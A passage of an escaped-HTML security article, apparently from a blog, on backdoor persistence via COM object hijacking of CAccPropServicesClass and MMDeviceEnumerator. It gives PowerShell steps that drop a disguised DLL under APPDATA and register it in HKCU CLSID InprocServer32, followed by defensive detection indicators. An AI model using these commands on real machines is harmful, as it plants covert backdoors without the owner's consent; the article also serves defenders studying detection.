$env:APPDATA\\Microsoft\\Installer -name {BCDE0395-E52F-467C-8E3D-C4579291692E} -type directory\u003Cbr>}\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>\u003Cstrong>3. Create payload file\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>First, determine the operating system\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>if ([Environment]::Is64BitOperatingSystem)\u003Cbr>{\u003Cbr>        Write-Host \"[+] OS: x64\"       \u003Cbr>}\u003Cbr>else\u003Cbr>{\u003Cbr>        Write-Host \"[+] OS: x86\"\u003Cbr>}\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Release different files for different systems\u003C\u002Fp>\u003Cp>Files are still released using base64, refer to article: https:\u002F\u002Fsome-open-source-project\u002FUse-Office-to-maintain-persistence\u003C\u002Fp>\u003Cp>\u003Cstrong>4. Create registry\u003C\u002Fstrong>\u003C\u002Fp>\u003Cp>Modify the default registry value, as shown below\u003C\u002Fp>\u003Cp>\u003Cimg alt=\"Alt text\" src=\"\u002Fapi\u002Fmedia\u002Ffile\u002Fdocx_image_1770017458473_5_5e3e11c43a-1.jpeg\">\u003C\u002Fp>\u003Cp>In PowerShell, the special variable \"(default)\" needs to be used\u003C\u002Fp>\u003Cp>eg:\u003C\u002Fp>\u003Ctable>\u003Ctbody>\u003Ctr>\u003Ctd>\u003Cp>$RegPath=\"HKCU:Software\\Classes\\CLSID\\\"\u003Cbr>New-ItemProperty $RegPath\"{b5f8350b-0548-48b1-a6ee-88bd00b4a5e7}\\InprocServer32\" \"(default)\" -value $env:APPDATA\"\\Microsoft\\Installer\\{BCDE0395-E52F-467C-8E3D-C4579291692E}\\api-ms-win-downlevel-1x86-l1-1-0._dl\" -propertyType string | Out-Null\u003C\u002Fp>\u003C\u002Ftd>\u003C\u002Ftr>\u003C\u002Ftbody>\u003C\u002Ftable>\u003Cp>Complete POC has been uploaded to GitHub, address: some-open-source-project\u003C\u002Fp>\u003Ch2>0x05 Defense Detection\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>Based on exploitation methods, monitor the following locations:\u003C\u002Fp>\u003Ch3>1. Registry key values\u003C\u002Fh3>\u003Cul>\u003Cli>HKCU\\Software\\Classes\\CLSID\\{b5f8350b-0548-48b1-a6ee-88bd00b4a5e7}\\\u003C\u002Fli>\u003Cli>HKCU\\Software\\Classes\\Wow6432Node\\CLSID\\{BCDE0395-E52F-467C-8E3D-C4579291692E }\u003C\u002Fli>\u003C\u002Ful>\u003Ch3>2. File Path\u003C\u002Fh3>\u003Cp>%APPDATA%\\Roaming\\Microsoft\\Installer\\{BCDE0395-E52F-467C-8E3D-C4579291692E}\\\u003C\u002Fp>\u003Cp>Naming convention: api-ms-win-downlevel-[4char-random]-l1-1-0._dl\u003C\u002Fp>\u003Ch2>0x06 Summary\u003C\u002Fh2>\u003Cp>---\u003C\u002Fp>\u003Cp>This article introduces a backdoor exploitation method achieved through COM Object hijacking, uses PowerShell scripts to write a POC, shares details to note during POC development, and analyzes defense methods against this backdoor based on practical exploitation processes.\u003C\u002Fp>\u003C\u002Fbody>\u003C\u002Fhtml>",777,"Onedaysec",4,"published","2026-02-02T07:38:21.453Z",{"title":37,"description":14,"keywords":38,"ogImage":39,"canonicalUrl":39,"noIndex":40},"COM Object Hijacking for Persistence: CAccPropServicesClass & MMDeviceEnumerator","COM object hijacking, persistence, backdoor, CAccPropServicesClass, MMDeviceEnumerator, registry exploit, DLL hijacking, no admin rights, bypass Autoruns, CLSID hijacking",null,false,[],{"docs":43,"hasNextPage":40},[4,44,45,46],694,693,692,{"title":39,"description":39,"image":39},"2026-07-24T15:37:11.822Z","2026-07-23T16:01:57.736Z","draft","2026-07-23T16:14:13.949Z"]